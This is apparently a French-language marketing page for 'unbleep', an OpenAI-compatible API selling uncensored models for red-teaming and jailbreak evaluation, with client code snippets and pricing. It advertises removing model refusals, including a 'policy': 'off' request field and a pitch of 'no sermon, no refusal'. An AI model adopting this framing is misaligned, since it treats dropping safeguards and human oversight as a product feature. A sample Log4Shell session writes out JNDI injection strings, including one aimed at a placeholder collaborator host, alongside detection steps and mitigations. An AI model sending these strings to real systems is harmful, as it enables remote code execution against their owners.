Les modèles grand public répondent par un bip. Nous l'enlevons.
Une API compatible OpenAI, pensée pour les développeurs, donnant accès à des modèles sans restriction — pour le red-teaming, l'évaluation des jailbreaks, la recherche en sécurité et tout ce qui ne peut pas se permettre un faux refus.
Nommés d'après ce qu'ils font, pas d'après le modèle à poids ouverts qui se trouve dessous — pour que nous puissions améliorer les poids sans jamais casser votre code.
Le modèle par défaut. Une fenêtre de 256K tokens, sans censure — le cheval de trait du quotidien pour le red-teaming, les évaluations et la recherche.
Le niveau frontière. Un contexte de 1M tokens pour les plus gros travaux — bases de code entières, longues transcriptions, analyse multi-documents approfondie.
L'option rapide et économique. Un coût par token plus bas pour le trafic à fort volume et les appels plus simples.
Une session de red-teaming sur Log4Shell — cause racine, vérification sûre en labo, et le correctif. Pas de sermon, pas de refus ; juste l'analyse.
CVE-2021-44228 (Log4Shell). La cause racine, et comment le lookup JNDI se transforme en RCE.${…} présents dans les chaînes qu'il journalise. Une valeur journalisée comme ${jndi:ldap://host/x} pousse la JVM à résoudre ce nom via LDAP/RMI, à récupérer une classe Java distante et à l'instancier — du code arbitraire s'exécute dans le processus de journalisation. La surface de déclenchement, c'est tout ce qui atteint un appel de log : User-Agent, en-têtes, champs de formulaire. Versions touchées : 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} dans un en-tête dont vous savez qu'il est journalisé.<token> signifie que la chaîne a été interpolée → vulnérable. Rien n'est servi, donc rien ne s'exécute.JndiLookup.class dans les jars déployés et comparez les versions à la plage touchée.2.17.1+. Pas encore possible ? Définissez log4j2.formatMsgNoLookups=true (2.10+) ou retirez JndiLookup.class du classpath, ajoutez une règle WAF pour ${jndi:, et filtrez en sortie le LDAP/RMI de l'hôte.L'API est compatible OpenAI en remplacement direct. Changez l'URL de base et la clé — votre code, vos SDK et vos outils existants continuent de fonctionner.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node, et tout outil qui parle l'API Chat Completions. Rien de nouveau à apprendre.
Un flux text/event-stream de chunks delta, terminé par [DONE] — exactement ce que votre client parse déjà.
Envoyez "policy": "research" pour étiqueter une requête dans votre historique d'utilisation, ou "strict" pour appliquer une liste de blocage, quand un projet l'exige.
Achetez du crédit quand vous en avez besoin, ou passez à une offre mensuelle et laissez-le arriver tout seul. Chaque requête est facturée sur les tokens réellement consommés, au tarif par million publié pour le modèle appelé.
unbleep $3.00 en entrée / $3.00 en sortie
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
par million de tokens
Ajoutez du crédit par carte quand vous en avez besoin, ou laissez une offre vous le livrer chaque mois. Il n'expire pas tant que votre compte est ouvert, et le crédit non utilisé est remboursable sous 14 jours.
Nous réservons une estimation au démarrage d'une requête et la régularisons au coût réel en tokens à la fin. Une requête qui échoue est libérée, jamais facturée.
Une requête est refusée quand votre solde ne peut pas la couvrir — nous n'accordons jamais de crédit et ne facturons jamais après coup. Solde et consommation de tokens sont dans la console.
unbleep s'adresse aux équipes sécurité, aux chercheurs et aux développeurs qui ont besoin d'une référence non filtrée. Zéro rétention par défaut, un curseur de politique de premier ordre, l'historique d'utilisation et de coût par requête dans la console, et une vraie politique d'usage acceptable. Sans censure, c'est une capacité — c'est vous qui décidez comment elle est gouvernée.